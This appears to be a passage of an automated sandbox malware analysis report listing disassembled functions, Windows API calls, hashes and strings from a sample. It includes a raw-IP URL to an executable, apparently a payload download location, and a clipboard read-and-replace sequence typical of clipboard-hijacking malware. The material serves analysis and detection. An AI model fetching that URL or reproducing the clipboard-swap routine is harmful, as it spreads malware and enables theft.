                                                                                                                                                                                                                                                  • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                                  • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001562), ref: 00401562
                                                                                                                                                                                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                                  • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                                  • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                                  • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                                  • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,02100223,?,?), ref: 02100E19
                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,02100223,?,?), ref: 02100E1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction ID: d5591706dddec6dc70c020a45b27ca906bb1356f428d6b1f08c8c78c4e708908
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D0123114512877D7002A94DC09BCD7B1CDF09B66F108011FB0DE9080C7B0954046E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                  • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                                  • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                                  • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 323602529-0
                                                                                                                                                                                                                                                  • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                                  • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3886170330-0
                                                                                                                                                                                                                                                  • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                                  • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                                  • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                  • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                  • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                  • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2005118841-0
                                                                                                                                                                                                                                                  • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                                                  • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                  • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                  • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00629CC6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmp, Offset: 00629000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_629000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction ID: fb11958d1d329d5b61a0ffef338bfa367a5348b0de719f1a5b1f9711c80072e0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB113C79A00208EFDB01DF98CA85E98BBF5AF48350F058094F9489B362D771EA50DF90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 0210194D
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001541,0000004C), ref: 02101957
                                                                                                                                                                                                                                                    • Part of subcall function 0210CE6D: _strlen.LIBCMT ref: 0210CE84
                                                                                                                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 02101984
                                                                                                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 02101994
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 021019B0
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 021019DF
                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 02101B23
                                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 02101B39
                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02101B46
                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02101B70
                                                                                                                                                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 02101B79
                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 02101B80
                                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 02101BA4
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002D2), ref: 02101BAF
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                                  • String ID: 4#E$i
                                                                                                                                                                                                                                                  • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                                  • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                                                                                                                                                                  • Instruction ID: f55d5f4a389d85a37d9925c1fbed716b88ad598414c434b06d1d8869a5cba082
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31511631C40784EED321DFA8DC857BD7B74FF1A306F045225D805A61A2EBB49785CB69
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02102392
                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 021023A7
                                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 021023AE
                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00646464), ref: 021023C1
                                                                                                                                                                                                                                                  • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021023E0
                                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02102401
                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0210240C
                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000008,00000000), ref: 02102415
                                                                                                                                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02102439
                                                                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 021024C4
                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 021024DC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1529870607-0
                                                                                                                                                                                                                                                  • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                                                  • Instruction ID: 1af3e26dae21b5313c84e9e9e02eaf5b1a67a2bbffaff59152def4cc3e2b27bd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2271ED72900228AFDB229F64DD85FAEBBBCEF09711F0041A5F609E6155DA70AF84CF14
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                                  • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA5E
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0213BCE4,?,00000000), ref: 0213BA87
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,0213BCE4,?,00000000), ref: 0213BA9C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction ID: 0e2f238ebff29a94d56b55a4f3e8c8d7e666c134ca2cd1d76765d4ab744fba7a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A721B032B8C905AAE7368F55D901BA773A7EB40E6CB578464E90AE7210FB32DF40C350
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2287132625-0
                                                                                                                                                                                                                                                  • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                                  • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                    • Part of subcall function 02132131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0213BCA5
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0213BD00
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0213BD0F
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,02130A0C,00000040,?,02130B2C,00000055,00000000,?,?,00000055,00000000), ref: 0213BD57
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,02130A8C,00000040), ref: 0213BD76
